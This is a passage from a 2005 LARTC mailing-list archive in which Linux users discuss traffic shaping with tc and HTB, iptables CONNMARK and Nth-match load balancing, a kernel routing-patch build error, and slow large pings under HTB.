Jan 8 11:58:42 2005 From: stef.coene@docum.org (Stef Coene) Date: Sat, 8 Jan 2005 12:58:42 +0100 Subject: [LARTC] tc and ntop inconsistent data flow In-Reply-To: <42020.212.175.247.7.1105115367.squirrel@webmail2.kibris.net> References: <50784.212.175.247.7.1105025581.squirrel@webmail2.kibris.net> <200501062028.16256.stef.coene@docum.org> <42020.212.175.247.7.1105115367.squirrel@webmail2.kibris.net> Message-ID: <200501081258.42878.stef.coene@docum.org> On Friday 07 January 2005 17:29, Mehmet Ali Suzen wrote: > Dear Stef Coene, > Many thanks for the tip. Seems like it is working now. But > I have restrict 2 way traffic with 42 Kbit, that is correspond > to 64 Kbit. Is it logical? I don't undestand what you want to say .... > What is the proportion between > dowload and upload in an ideal data flow? That depends on the type dateflow. Stef From andy.furniss@dsl.pipex.com Sat Jan 8 12:02:50 2005 From: andy.furniss@dsl.pipex.com (Andy Furniss) Date: Sat, 08 Jan 2005 12:02:50 +0000 Subject: [LARTC] How to balance OUTBOUND traffic by packet if.. In-Reply-To: <1383.192.168.1.2.1105108845@maild.mine.nu> References: <1383.192.168.1.2.1105108845@maild.mine.nu> Message-ID: <41DFCBEA.2090809@dsl.pipex.com> junk@maild.mine.nu wrote: > how to use iproute/iptables to balance by packet OUTBOUND traffic between > 2 PPP (pptp cable modem and pppoe adsl modem) links to the same ISP . also > by using the fact that the ISP dosen't filter source IP address - meaning > i can use either PPP's link assigned IP address as the source IP in the ip > header.., it works for both devices.., what i want to achive is : when > uploading a large file , i could use both devices to shoot data but bound > only to one source IP. > > Naturally i could expect all data to go back through the device with that > corresponding IP , atleast that is what happens according to ethereal Quick copy n past of a reply I gave recently. Another way you could look into is doing it at IP level using the netfilter patch Nth. You could just round robin packets over the links - not as nice as multilink as packet size isn't accounted for, but may be OK in practise. Below is the help for it - You may not need to do the NAT but AIUI you could use it to mark and then route using the marks. Andy. Author: Fabrice MARIE Status: Works For Me. This option adds CONFIG_IP_NF_MATCH_NTH, which supplies a match module that will allow you to match every Nth packet encountered. By default there are 16 different counters that can be used. This match functions in one of two ways 1) Match ever Nth packet, and only the Nth packet. example: iptables -t mangle -A PREROUTING -m nth --every 10 -j DROP This rule will drop every 10th packet. 2) Unique rule for every packet. This is an easy and quick method to produce load-balancing for both inbound and outbound. example: iptables -t nat -A POSTROUTING -o eth0 -m nth --counter 7 \ --every 3 --packet 0 -j SNAT --to-source 10.0.0.5 iptables -t nat -A POSTROUTING -o eth0 -m nth --counter 7 \ --every 3 --packet 1 -j SNAT --to-source 10.0.0.6 iptables -t nat -A POSTROUTING -o eth0 -m nth --counter 7 \ --every 3 --packet 2 -j SNAT --to-source 10.0.0.7 This example evenly splits connections between the three SNAT addresses. By using the mangle table and iproute2, you can setup complex load-balanced routing. There's lot of other uses. Be creative! Suppported options are: --every Nth Match every Nth packet [--counter] num Use counter 0-15 (default:0) [--start] num Initialize the counter at the number 'num' instead of 0. Must be between 0 and Nth-1 [--packet] num Match on 'num' packet. Must be between 0 and Nth-1. If --packet is used for a counter than there must be Nth number of --packet rules, covering all values between 0 and Nth-1 inclusively. Andy. From bhleandro@ig.com.br Sat Jan 8 13:02:44 2005 From: bhleandro@ig.com.br (Leandro Travaglia) Date: Sat, 08 Jan 2005 11:02:44 -0200 Subject: [LARTC] CONNMARK problem In-Reply-To: <1103856503.21586.47.camel@neuromancer.home.net> References: <1103856503.21586.47.camel@neuromancer.home.net> Message-ID: <41DFD9F4.6020408@ig.com.br> Hi all, I have IPTABLES 1.2.10 and i have a weird problem with CONNMARK When i run: # iptables -v -t mangle -F # iptables -v -t mangle -A PREROUTING -p tcp -j CONNMARK --restore-mark CONNMARK tcp opt -- in * out * 0.0.0.0/0 -> 0.0.0.0/0 CONNMARK restore iptables: No chain/target/match by that name Why is that happening?? The command: # iptables -v -j CONNMARK -h returns: CONNMARK target v1.2.10 options: --set-mark value[/mask] Set conntrack mark value --save-mark [--mask mask] Save the packet nfmark in the connection --restore-mark [--mask mask] Restore saved nfmark value So everything seens fine to me........ Thanks... -- No virus found in this outgoing message. Checked by AVG Anti-Virus. Version: 7.0.300 / Virus Database: 265.6.9 - Release Date: 6/1/2005 From jayesh@bol.co.tz Sat Jan 8 15:32:05 2005 From: jayesh@bol.co.tz (jayesh) Date: Sat, 8 Jan 2005 18:32:05 +0300 Subject: [LARTC] script Message-ID: <002401c4f597$351c2400$fd00000a@jayesh> This is a multi-part message in MIME format. ------=_NextPart_000_0021_01C4F5B0.5A623010 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable dear all=20 iam newbie , i have 256 kbits of down link and 64 kbits of up link iam = using squid and htb i have got this while browsing the net , there are = some few issues i need help=20 while running the script i want browsing to be as fast as possible , = uplink especially kaaza should not eat my band width.=20 eth1 got public ip address and eth0 is internal with network = 10.0.0.0/24 iam also using nat , how can i make squid incoporates with = htb (squid uses 3128) here is my script=20 #!/bin/bash TC=3D/sbin/tc=20 IPTABLES=3D/sbin/iptables $TC qdisc del dev eth0 root 2> /dev/null > /dev/null $TC qdisc del dev eth1 root 2> /dev/null > /dev/null $TC qdisc del dev eth1 ingress 2> /dev/null > /dev/null $IPTABLES -F POSTROUTING -t mangle $TC qdisc add dev eth0 root handle 1: htb default 50 r2q 2 $TC class add dev eth0 parent 1: classid 1:2 htb rate 248Kbit burst 35k $TC class add dev eth0 parent 1:2 classid 1:10 htb rate 220Kbit ceil = 240Kbit burst 25k prio 0 $TC class add dev eth0 parent 1:2 classid 1:30 htb rate 28Kbit ceil = 28Kbit burst 10k prio 1=20 $TC class add dev eth0 parent 1: classid 1:60 htb rate 1Kbit ceil = 100Mbit prio 1 $TC qdisc add dev eth0 parent 1:10 handle 11: sfq perturb 10 $TC qdisc add dev eth0 parent 1:30 handle 33: sfq perturb 10 $IPTABLES -t mangle -A POSTROUTING -o eth0 -s ! 10.0.0.0/24 -j MARK = --set-mark 3 $IPTABLES -t mangle -A POSTROUTING -o eth0 -s ! 10.0.0.0/24 -p tcp = --sport 80 -j MARK --set-mark 1 $IPTABLES -t mangle -A POSTROUTING -o eth0 -s ! 10.0.0.0/24 -p tcp = --sport 443 -j MARK --set-mark 1 $IPTABLES -t mangle -A POSTROUTING -o eth0 -s ! 10.0.0.0/24 -p tcp = --sport 22 -j MARK --set-mark 1 $IPTABLES -t mangle -A POSTROUTING -o eth0 -s ! 10.0.0.0/24 -p tcp = --sport 21 -j MARK --set-mark 1 $IPTABLES -t mangle -A POSTROUTING -o eth0 -s ! 10.0.0.0/24 -p tcp = --sport 53 -j MARK --set-mark 1=20 $IPTABLES -t mangle -A POSTROUTING -o eth0 -s ! 10.0.0.0/24 -p udp = --sport 53 -j MARK --set-mark 1=20 $IPTABLES -t mangle -A POSTROUTING -o eth0 -s ! 10.0.0.0/24 -p tcp = --sport 110 -j MARK --set-mark 1 $IPTABLES -t mangle -A POSTROUTING -o eth0 -s ! 10.0.0.0/24 -p tcp = --sport 5190 -j MARK --set-mark 1 $IPTABLES -t mangle -A POSTROUTING -o eth0 -s ! 10.0.0.0/24 -p tcp = --sport 6661:6669 -j MARK --set-mark 1=20 $IPTABLES -t mangle -A POSTROUTING -o eth0 -s ! 10.0.0.0/24 -p tcp = --sport 3128 -j MARK --set-mark 1 $IPTABLES -t mangle -A POSTROUTING -o eth0 -s ! 10.0.0.0/24 -p udp = --sport 3128 -j MARK --set-mark 1#$IPTABLES -t mangle -A POSTROUTING -o = eth0 -s ! 10.0.0.0/24 -p icmp -j MARK --set-mark 1 =20 $TC filter add dev eth0 parent 1:0 protocol ip handle 1 fw flowid 1:10 $TC filter add dev eth0 parent 1:0 protocol ip handle 3 fw flowid 1:30 $TC filter add dev eth0 parent 1:0 protocol ip prio 1 u32 \ match ip protocol 0x6 0xff \ match ip tos 0x10 0xff \ flowid 1:60 =20 ############################## $TC qdisc add dev eth1 root handle 1: htb default 20 $TC class add dev eth1 parent 1: classid 1:1 htb rate 62Kbit burst 35k $TC class add dev eth1 parent 1:1 classid 1:10 htb rate 40Kbit ceil = 60Kbit burst 25k prio 1 $TC class add dev eth1 parent 1:1 classid 1:20 htb rate 15Kbit ceil = 55Kbit burst 10k prio 2 $TC class add dev eth1 parent 1:1 classid 1:30 htb rate 7Kbit ceil = 28Kbit burst 5k prio 3 $TC qdisc add dev eth1 parent 1:10 handle 10: sfq perturb 10 $TC qdisc add dev eth1 parent 1:20 handle 20: sfq perturb 10 $TC qdisc add dev eth1 parent 1:30 handle 30: sfq perturb 10 $TC filter add dev eth1 parent 1:0 protocol ip prio 10 u32 \ match ip tos 0x10 0xff flowid 1:10 $TC filter add dev eth1 parent 1: protocol ip prio 10 u32 \ match ip protocol 6 0xff \ match u8 0x05 0x0f at 0 \ match u16 0x0000 0xffc0 at 2 \ match u8 0x10 0xff at 33 \ flowid 1:10 =20 $IPTABLES -t mangle -A POSTROUTING -o eth1 -s ! 10.0.0.0/24 -j MARK = --set-mark 12 # $IPTABLES -t mangle -A POSTROUTING -o eth1 -s ! 10.0.0.0/24 -p icmp -j = MARK --set-mark 11 $IPTABLES -t mangle -A POSTROUTING -o eth1 -s ! 10.0.0.0/24 -p tcp = --sport 22 -j MARK --set-mark 11 $IPTABLES -t mangle -A POSTROUTING -o eth1 -s ! 10.0.0.0/24 -p tcp = --sport 80 -j MARK --set-mark 11 $IPTABLES -t mangle -A POSTROUTING -o eth1 -s ! 10.0.0.0/24 -p tcp = --dport 80 -j MARK --set-mark 11 $IPTABLES -t mangle -A POSTROUTING -o eth1 -s ! 10.0.0.0/24 -p tcp = --dport 21 -j MARK --set-mark 11 $IPTABLES -t mangle -A POSTROUTING -o eth1 -s ! 10.0.0.0/24 -p tcp = --dport 20 -j MARK --set-mark 11 $IPTABLES -t mangle -A POSTROUTING -o eth1 -s ! 10.0.0.0/24 -p tcp = --sport 3128 -j MARK --set-mark 11 $IPTABLES -t mangle -A POSTROUTING -o eth1 -s ! 10.0.0.0/24 -p tcp = --dport 3128 -j MARK --set-mark 11 $IPTABLES -t mangle -A POSTROUTING -o eth1 -s 10.0.0.0/24 -j MARK = --set-mark 13 =20 $IPTABLES -t mangle -A POSTROUTING -o eth1 -s 10.0.0.0/24 -p tcp --dport = 80 -j MARK --set-mark 11 $IPTABLES -t mangle -A POSTROUTING -o eth1 -s 10.0.0.0/24 -p tcp = --dport 443 -j MARK --set-mark 11 $IPTABLES -t mangle -A POSTROUTING -o eth1 -s 10.0.0.0/24 -p tcp = --dport 53 -j MARK --set-mark 11 $IPTABLES -t mangle -A POSTROUTING -o eth1 -s 10.0.0.0/24 -p udp = --dport 53 -j MARK --set-mark 11 $IPTABLES -t mangle -A POSTROUTING -o eth1 -s 10.0.0.0/24 -p tcp = --dport 22 -j MARK --set-mark 11 $IPTABLES -t mangle -A POSTROUTING -o eth1 -s 10.0.0.0/24 -p tcp = --dport 23 -j MARK --set-mark 11 $IPTABLES -t mangle -A POSTROUTING -o eth1 -s 10.0.0.0/24 -p tcp = --dport 21 -j MARK --set-mark 11 $IPTABLES -t mangle -A POSTROUTING -o eth1 -s 10.0.0.0/24 -p tcp = --dport 25 -j MARK --set-mark 11 $IPTABLES -t mangle -A POSTROUTING -o eth1 -s 10.0.0.0/24 -p tcp = --dport 110 -j MARK --set-mark 11 $IPTABLES -t mangle -A POSTROUTING -o eth1 -s 10.0.0.0/24 -p tcp = --dport 5190 -j MARK --set-mark 11 $IPTABLES -t mangle -A POSTROUTING -o eth1 -s 10.0.0.0/24 -p tcp = --dport 6661:6669 -j MARK --set-mark 11 $IPTABLES -t mangle -A POSTROUTING -p icmp -j MARK --set-mark 11 $IPTABLES -t mangle -A POSTROUTING -o eth0 -s 10.0.0.0/24 -p udp --dport = 3128 -j MARK --set-mark 11 $IPTABLES -t mangle -A POSTROUTING -o eth0 -s 10.0.0.0/24 -p tcp --dport = 3128 -j MARK --set-mark 11 #$IPTABLES -t mangle -A POSTROUTING -p icmp -j RETURN $TC filter add dev eth1 parent 1:0 protocol ip handle 11 fw flowid 1:10 $TC filter add dev eth1 parent 1:0 protocol ip handle 12 fw flowid 1:20 $TC filter add dev eth1 parent 1:0 protocol ip handle 13 fw flowid 1:30 please help with clarification=20 regards Dealing in Computers, Software and Peripherals=20 =20 Jayesh Chandran Compucat Technologies (An associate of Milan Cable Television) 1.Goliondoi Road, Arusha. 2.Ground Floor, Serengeti Wing, PB No. 10367, AICC, Arusha, Tanzania =20 jayesh@bol.co.tz tel:=20 fax:=20 mobile: +255 27 2502660 +255 27 2504527 +255 748 586169 =20 =20 =20 =20 =20 Add me to your address book... Want a signature like this?=20 =20 ------=_NextPart_000_0021_01C4F5B0.5A623010 Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable
dear all
iam  newbie , i have 256 kbits of = down link=20 and 64 kbits of up link iam using squid and htb i have got = this  while=20 browsing the net , there are some few issues i need help
while running the script i want  = browsing to=20 be as fast as possible , uplink especially kaaza should not eat my band = width.=20
eth1  got public ip address and = eth0 is=20 internal with network 10.0.0.0/24 iam also using nat , how can = i make=20 squid incoporates with htb (squid uses 3128)
here is my script
#!/bin/bash
 TC=3D/sbin/tc =
IPTABLES=3D/sbin/iptables
 $TC=20 qdisc del dev eth0 root 2> /dev/null > /dev/null
 $TC = qdisc del=20 dev eth1 root 2> /dev/null > /dev/null
 $TC qdisc del dev = eth1=20 ingress 2> /dev/null > /dev/null
 $IPTABLES -F POSTROUTING = -t=20 mangle
  $TC qdisc add dev eth0 root handle 1: htb default 50 = r2q=20 2
 
 $TC class add dev eth0 parent 1: classid 1:2 htb rate 248Kbit = burst=20 35k
 $TC class add dev eth0 parent 1:2 classid 1:10 htb rate = 220Kbit=20 ceil 240Kbit burst 25k prio 0
$TC class add dev eth0 parent 1:2 = classid 1:30=20 htb rate 28Kbit ceil 28Kbit burst 10k prio 1
$TC class add dev eth0 = parent=20 1: classid 1:60 htb rate 1Kbit ceil 100Mbit  prio 1
 $TC = qdisc add=20 dev eth0 parent 1:10 handle 11: sfq perturb 10
 $TC qdisc add = dev eth0=20 parent 1:30 handle 33: sfq perturb 10
 $IPTABLES -t mangle -A=20 POSTROUTING -o eth0 -s ! 10.0.0.0/24 -j MARK --set-mark = 3
 $IPTABLES -t=20 mangle -A POSTROUTING -o eth0 -s ! 10.0.0.0/24 -p tcp --sport 80 -j MARK = --set-mark 1
 $IPTABLES -t mangle -A POSTROUTING -o eth0 -s !=20 10.0.0.0/24 -p tcp --sport 443 -j MARK --set-mark 1
 $IPTABLES = -t mangle=20 -A POSTROUTING -o eth0 -s ! 10.0.0.0/24 -p tcp --sport 22 -j MARK = --set-mark=20 1
 $IPTABLES -t mangle -A POSTROUTING -o eth0 -s ! 10.0.0.0/24 = -p tcp=20 --sport 21 -j MARK --set-mark 1
 $IPTABLES -t mangle -A = POSTROUTING -o=20 eth0 -s ! 10.0.0.0/24 -p tcp --sport 53 -j MARK --set-mark 1 =
$IPTABLES -t=20 mangle -A POSTROUTING -o eth0 -s ! 10.0.0.0/24 -p udp --sport 53 -j MARK = --set-mark 1
$IPTABLES -t mangle -A POSTROUTING -o eth0 -s ! = 10.0.0.0/24 -p=20 tcp --sport 110 -j MARK --set-mark 1
 $IPTABLES -t mangle -A = POSTROUTING=20 -o eth0 -s ! 10.0.0.0/24 -p tcp --sport 5190 -j MARK --set-mark = 1
$IPTABLES=20 -t mangle -A POSTROUTING -o eth0 -s ! 10.0.0.0/24 -p tcp --sport = 6661:6669 -j=20 MARK --set-mark 1
$IPTABLES -t mangle -A POSTROUTING -o eth0 -s !=20 10.0.0.0/24 -p tcp --sport 3128 -j MARK --set-mark 1
$IPTABLES -t = mangle -A=20 POSTROUTING -o eth0 -s ! 10.0.0.0/24 -p udp --sport 3128 -j MARK = --set-mark=20 1#$IPTABLES -t mangle -A POSTROUTING -o eth0 -s ! 10.0.0.0/24 -p icmp -j = MARK=20 --set-mark 1
 
 $TC filter add dev eth0 parent 1:0 = protocol ip=20 handle 1 fw flowid 1:10
 $TC filter add dev eth0 parent 1:0 = protocol ip=20 handle 3 fw flowid 1:30
 $TC filter add dev eth0 parent 1:0 = protocol ip=20 prio 1 u32 \
 match ip protocol 0x6 0xff \
  match = ip tos=20 0x10 0xff \
 flowid=20 1:60
 
##############################
$TC qdisc add dev = eth1 root=20 handle 1: htb default 20
 $TC class add dev eth1 parent 1: = classid 1:1=20 htb rate 62Kbit burst 35k
 $TC class add dev eth1 parent 1:1 = classid=20 1:10 htb rate 40Kbit ceil 60Kbit burst 25k prio 1
 $TC class add = dev=20 eth1 parent 1:1 classid 1:20 htb rate 15Kbit ceil 55Kbit burst 10k prio=20 2
 $TC class add dev eth1 parent 1:1 classid 1:30 htb rate 7Kbit = ceil=20 28Kbit burst 5k prio 3
 $TC qdisc add dev eth1 parent 1:10 = handle 10:=20 sfq perturb 10
 $TC qdisc add dev eth1 parent 1:20 handle 20: = sfq=20 perturb 10
 $TC qdisc add dev eth1 parent 1:30 handle 30: sfq = perturb=20 10
 $TC filter add dev eth1 parent 1:0 protocol ip prio 10 u32=20 \
   match ip tos 0x10 0xff  flowid 1:10
 $TC = filter=20 add dev eth1 parent 1: protocol ip prio 10 u32 \
    = match ip=20 protocol 6 0xff \
    match u8 0x05 0x0f at 0=20 \
    match u16 0x0000 0xffc0 at 2 = \
   =20 match u8 0x10 0xff at 33 \
    flowid=20 1:10
 
 $IPTABLES -t mangle -A POSTROUTING -o eth1 -s !=20 10.0.0.0/24 -j MARK --set-mark 12
# $IPTABLES -t mangle -A = POSTROUTING -o=20 eth1 -s ! 10.0.0.0/24 -p icmp -j MARK --set-mark 11
 $IPTABLES = -t mangle=20 -A POSTROUTING -o eth1 -s ! 10.0.0.0/24 -p tcp --sport 22 -j MARK = --set-mark=20 11
 $IPTABLES -t mangle -A POSTROUTING -o eth1 -s ! 10.0.0.0/24 = -p tcp=20 --sport 80 -j MARK --set-mark 11
 $IPTABLES -t mangle -A = POSTROUTING -o=20 eth1 -s ! 10.0.0.0/24 -p tcp --dport 80 -j MARK --set-mark = 11
 $IPTABLES=20 -t mangle -A POSTROUTING -o eth1 -s ! 10.0.0.0/24 -p tcp --dport 21 -j = MARK=20 --set-mark 11
 $IPTABLES -t mangle -A POSTROUTING -o eth1 -s !=20 10.0.0.0/24 -p tcp --dport 20 -j MARK --set-mark 11
 $IPTABLES = -t mangle=20 -A POSTROUTING -o eth1 -s ! 10.0.0.0/24 -p tcp --sport 3128 -j MARK = --set-mark=20 11
  $IPTABLES -t mangle -A POSTROUTING -o eth1 -s ! 10.0.0.0/24 = -p tcp=20 --dport 3128  -j MARK --set-mark 11
 $IPTABLES -t mangle -A = POSTROUTING -o eth1 -s 10.0.0.0/24 -j MARK --set-mark = 13
 
$IPTABLES=20 -t mangle -A POSTROUTING -o eth1 -s 10.0.0.0/24 -p tcp --dport 80 -j = MARK=20 --set-mark 11
 $IPTABLES -t mangle -A POSTROUTING -o eth1 -s = 10.0.0.0/24=20 -p tcp --dport 443 -j MARK --set-mark 11
 $IPTABLES -t mangle -A = POSTROUTING -o eth1 -s 10.0.0.0/24 -p tcp --dport 53 -j MARK --set-mark=20 11
 $IPTABLES -t mangle -A POSTROUTING -o eth1 -s 10.0.0.0/24 -p = udp=20 --dport 53 -j MARK --set-mark 11
 $IPTABLES -t mangle -A = POSTROUTING -o=20 eth1 -s 10.0.0.0/24 -p tcp --dport 22 -j MARK --set-mark = 11
 $IPTABLES=20 -t mangle -A POSTROUTING -o eth1 -s 10.0.0.0/24 -p tcp --dport 23 -j = MARK=20 --set-mark 11
 $IPTABLES -t mangle -A POSTROUTING -o eth1 -s = 10.0.0.0/24=20 -p tcp --dport 21 -j MARK --set-mark 11
 $IPTABLES -t mangle -A=20 POSTROUTING -o eth1 -s 10.0.0.0/24 -p tcp --dport 25 -j MARK --set-mark=20 11
 $IPTABLES -t mangle -A POSTROUTING -o eth1 -s 10.0.0.0/24 -p = tcp=20 --dport 110 -j MARK --set-mark 11
 $IPTABLES -t mangle -A = POSTROUTING -o=20 eth1 -s 10.0.0.0/24 -p tcp --dport 5190 -j MARK --set-mark = 11
 $IPTABLES=20 -t mangle -A POSTROUTING -o eth1 -s 10.0.0.0/24 -p tcp --dport 6661:6669 = -j MARK=20 --set-mark 11
$IPTABLES -t mangle -A POSTROUTING -p icmp -j MARK = --set-mark=20 11
$IPTABLES -t mangle -A POSTROUTING -o eth0 -s 10.0.0.0/24 -p udp = --dport=20 3128 -j MARK --set-mark 11
$IPTABLES -t mangle -A POSTROUTING -o eth0 = -s=20 10.0.0.0/24 -p tcp --dport 3128 -j MARK --set-mark 11
#$IPTABLES -t = mangle -A=20 POSTROUTING -p icmp -j RETURN
$TC filter add dev eth1 parent 1:0 = protocol ip=20 handle 11 fw flowid 1:10
 $TC filter add dev eth1 parent 1:0 = protocol ip=20 handle 12 fw flowid 1:20
 $TC filter add dev eth1 parent 1:0 = protocol ip=20 handle 13 fw flowid 1:30
 
please help with clarification =
regards
 
Dealing in Computers, Software and=20 Peripherals
Jayesh Chandran Compucat Technologies
(An=20 associate of Milan Cable = Television)
1.Goliondoi=20 Road, Arusha.
2.Ground Floor, Serengeti = Wing,
PB=20 No. 10367, AICC, Arusha, Tanzania
jayesh@bol.co.tz
tel: =
fax:=20
mobile: 		+255 27 2502660
+255 27=20 2504527
+255 748 586169=20 =
Add me to your address = book... Want a signature like=20 = this?
------=_NextPart_000_0021_01C4F5B0.5A623010-- From dseshadri@broadbandmaritime.com Sat Jan 8 16:16:16 2005 From: dseshadri@broadbandmaritime.com (Deepak Seshadri) Date: Sat, 8 Jan 2005 11:16:16 -0500 Subject: [LARTC] TC GUI or graphs? In-Reply-To: <20050105173006.10237.qmail@web12302.mail.yahoo.com> Message-ID: <200501081616.j08GGG81040321@jkcpub.iserver.net> Thank you very much for the replies, Jason, Horst & Jonathan. I'll look into all these options. Deepak Seshadri > -----Original Message----- > From: lartc-admin@mailman.ds9a.nl [mailto:lartc-admin@mailman.ds9a.nl] On > Behalf Of Jonathan Day > Sent: Wednesday, January 05, 2005 12:30 PM > To: jasonb@edseek.com; lartc@mailman.ds9a.nl > Subject: Re: [LARTC] TC GUI or graphs? > > There are GUIs for HTB, but no guarantee they'll work > with current systems or with what you want to do. > > http://freshmeat.net/projects/easyshape/ > http://freshmeat.net/projects/khtb/ > http://freshmeat.net/projects/ktctool/ > http://freshmeat.net/projects/bwmtools/ > http://freshmeat.net/projects/htbgui/ > http://freshmeat.net/projects/arbitrator/ > http://freshmeat.net/projects/ibmonitor/ > > P.S. I rarely use Google to search for software. :) > > --- Jason Boxman wrote: > > > On Wednesday 05 January 2005 09:55, Deepak Seshadri > > wrote: > > > Hello everybody, > > > > > > I am new to the lartc mailing list. I have been > > using "tc" for some time > > > now. To be precise, tc & HTB to shape traffic. I > > did a lot of search on > > > Google for 2 things: > > > > > > - A GUI to create configure new qdiscs & classes > > for HTB > > > > There are two projects, the one I remember being > > lql, designed at creating > > libraries for plugging into netlink directly for QoS > > stuff. One of these > > days there will probably be a nice GUI available. > > Presently I don't know of > > any. > > > > > __________________________________ > Do you Yahoo!? > Yahoo! Mail - now with 250MB free storage. Learn more. > http://info.mail.yahoo.com/mail_250 > _______________________________________________ > LARTC mailing list / LARTC@mailman.ds9a.nl > http://mailman.ds9a.nl/mailman/listinfo/lartc HOWTO: http://lartc.org/ From lists@L8R.net Sat Jan 8 20:13:56 2005 From: lists@L8R.net (Brad Barnett) Date: Sat, 8 Jan 2005 15:13:56 -0500 Subject: [LARTC] problems with 2.4.28 + Julian's patch Message-ID: <20050108151356.563f2682@be.back.l8r.net> With 2.4.28 and Julian Anastasov's http://www.ssi.bg/~ja/routes-2.4.27-9.diff patch, I get the following when I attempt to build my kernel. Any ideas? Thanks! gcc -D__KERNEL__ -I/usr/src/linux/include -Wall -Wstrict-prototypes -Wno-trigraphs -O2 -fno-strict-aliasing -fno-common -fomit-frame-pointer -pipe -mpreferred-stack-boundary=2 -march=i686 -fno-unit-at-a-time -nostdinc -iwithprefix include -DKBUILD_BASENAME=fib_frontend -c -o fib_frontend.o fib_frontend.c fib_frontend.c: In function `fib_validate_source': /usr/src/linux/include/net/ip_fib.h:178: sorry, unimplemented: inlining failed in call to 'fib_result_table': function body not available fib_frontend.c:253: sorry, unimplemented: called from here /usr/src/linux/include/net/ip_fib.h:178: sorry, unimplemented: inlining failed in call to 'fib_result_table': function body not available fib_frontend.c:263: sorry, unimplemented: called from here make[3]: *** [fib_frontend.o] Error 1 make[3]: Leaving directory `/usr/src/linux/net/ipv4' make[2]: *** [first_rule] Error 2 make[2]: Leaving directory `/usr/src/linux/net/ipv4' make[1]: *** [_subdir_ipv4] Error 2 make[1]: Leaving directory `/usr/src/linux/net' make: *** [_dir_net] Error 2 From ja@ssi.bg Sat Jan 8 20:47:49 2005 From: ja@ssi.bg (Julian Anastasov) Date: Sat, 8 Jan 2005 22:47:49 +0200 (EET) Subject: [LARTC] problems with 2.4.28 + Julian's patch In-Reply-To: <20050108151356.563f2682@be.back.l8r.net> References: <20050108151356.563f2682@be.back.l8r.net> Message-ID: Hello, On Sat, 8 Jan 2005, Brad Barnett wrote: > With 2.4.28 and Julian Anastasov's > > http://www.ssi.bg/~ja/routes-2.4.27-9.diff > > patch, I get the following when I attempt to build my kernel. Any ideas? Can you try routes-2.4.28-9.diff, i just uploaded it after removing __inline__. > Thanks! > > gcc -D__KERNEL__ -I/usr/src/linux/include -Wall -Wstrict-prototypes -Wno-trigraphs -O2 -fno-strict-aliasing -fno-common -fomit-frame-pointer -pipe -mpreferred-stack-boundary=2 -march=i686 -fno-unit-at-a-time -nostdinc -iwithprefix include -DKBUILD_BASENAME=fib_frontend -c -o fib_frontend.o fib_frontend.c > fib_frontend.c: In function `fib_validate_source': > /usr/src/linux/include/net/ip_fib.h:178: sorry, unimplemented: inlining failed in call to 'fib_result_table': function body not available > fib_frontend.c:253: sorry, unimplemented: called from here > /usr/src/linux/include/net/ip_fib.h:178: sorry, unimplemented: inlining failed in call to 'fib_result_table': function body not available > fib_frontend.c:263: sorry, unimplemented: called from here > make[3]: *** [fib_frontend.o] Error 1 > make[3]: Leaving directory `/usr/src/linux/net/ipv4' > make[2]: *** [first_rule] Error 2 > make[2]: Leaving directory `/usr/src/linux/net/ipv4' > make[1]: *** [_subdir_ipv4] Error 2 > make[1]: Leaving directory `/usr/src/linux/net' > make: *** [_dir_net] Error 2 Regards -- Julian Anastasov From kasp Sun Jan 9 11:36:10 2005 From: kasp (kasp) Date: Sun, 9 Jan 2005 13:36:10 +0200 Subject: [LARTC] Slow large pings Message-ID: <729574587.20050109133610@inbox.lv> Hello lartc, Testing some rules I found out that any rules are slowing down large pings! For example: tc qdisc add dev eth0 root handle 1: htb tc class add dev eth0 parent 1: classid 1:1 htb rate 100Mbit prio 1 ceil 100Mbit tc class add dev eth0 parent 1:1 classid 1:2 htb rate 100Mbit prio 2 ceil 100Mbit tc filter add dev eth0 parent 1:0 prio 5 u32 \ match ip src 10.10.10.1 \ match ip dst 10.10.10.10 \ flowid 1:2 tc qdisc add dev eth0 parent 1:2 handle 2: sfq perturb 10 Small pings are ok - <10ms, here is output for 65500 byte pings: Pinging test [10.10.10.1] with 65500 bytes of data: Reply from 10.10.10.1: bytes=65500 time=120ms TTL=64 Reply from 10.10.10.1: bytes=65500 time=120ms TTL=64 Reply from 10.10.10.1: bytes=65500 time=120ms TTL=64 Reply from 10.10.10.1: bytes=65500 time=120ms TTL=64 Ping statistics for 10.10.10.1: Packets: Sent = 4, Received = 4, Lost = 0 (0% loss), Approximate round trip times in milli-seconds: Minimum = 120ms, Maximum = 120ms, Average = 120ms If I don't use any rules, 65500 byte pings are about ~10ms Any filters are slowing large pings for 10 times!!! What can I do to tune it up? -- Best regards, kasp mailto:waters@inbox.lv From bhleandro@ig.com.br Sun Jan 9 11:53:24 2005 From: bhleandro@ig.com.br (Leandro Travaglia) Date: Sun, 09 Jan 2005 09:53:24 -0200 Subject: [LARTC] CONNMARK problem In-Reply-To: <41DFDB40.1040000@cardvn.net> References: <1103856503.21586.47.camel@neuromancer.home.net> <41DFD9F4.6020408@ig.com.br> <41DFDB40.1040000@cardvn.net> Message-ID: <41E11B34.8080004@ig.com.br> I see... I'll do this. But..... Is CONNMARK supported in newer versions of the Kernel? Wich one? Regards, LEANDRO TRAVAGLIA Nguyen Dinh Nam wrote: > it's because your kernel doesn't support CONNMARK, apply patch-o-matic > then recompile your kernel, then it'll work. > > Leandro Travaglia wrote: > >> Hi all, >> >> I have IPTABLES 1.2.10 and i have a weird problem with CONNMARK >> >> When i run: >> # iptables -v -t mangle -F >> # iptables -v -t mangle -A PREROUTING -p tcp -j CONNMARK --restore-mark >> CONNMARK tcp opt -- in * out * 0.0.0.0/0 -> 0.0.0.0/0 CONNMARK >> restore >> iptables: No chain/target/match by that name >> >> Why is that happening?? >> >> The command: >> # iptables -v -j CONNMARK -h >> returns: >> CONNMARK target v1.2.10 options: >> --set-mark value[/mask] Set conntrack mark value >> --save-mark [--mask mask] Save the packet nfmark in the connection >> --restore-mark [--mask mask] Restore saved nfmark value >> >> So everything seens fine to me........ >> >> Thanks... >> >> > > > > From nug@sch.bme.hu Sun Jan 9 18:09:52 2005 From: nug@sch.bme.hu (=?ISO-8859-1?Q?T=F3th_N=E1ndor?=) Date: Sun, 09 Jan 2005 19:09:52 +0100 Subject: [LARTC] traffic shaping gre tunnels Message-ID: <41E17370.5060502@sch.bme.hu> Hi! I have successfully set up traffic shaping at our site using your and others howtos. I have a linux firewall (gateway), two leased lines. I shape only the incoming traffix now. I use HTB+SFQ and sort the packets using iptables with the CLASSIFY patch. It works very well. eth1----ISP2-\ eth2----ISP1--LINUX--internal 